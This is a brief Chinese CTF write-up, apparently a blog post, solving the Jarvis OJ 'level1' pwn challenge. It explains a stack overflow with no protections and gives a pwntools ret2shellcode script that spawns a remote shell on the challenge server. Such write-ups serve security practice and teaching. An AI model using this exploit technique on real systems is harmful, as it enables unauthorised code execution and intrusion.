level1

checksec 一下,发现什么都没开

image.png
image.png

IDA里看一下,存在栈溢出,还给我们打印了栈的地址

image.png

再加上没有开启NX,那就是很明显 的ret2shellcode了
exp:

from pwn import *
# p = process('./level1')
p = remote("pwn2.jarvisoj.com","9877")
p.recvuntil(":")
r = p.recvuntil("?")
print r[:10]
buf = int(r[:10],16)
# pause()
shellcode = asm(shellcraft.sh())
print hex(len(shellcode))
pause()
payload = shellcode + (0x8c - len(shellcode))*"A" + p32(buf)
p.sendline(payload)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。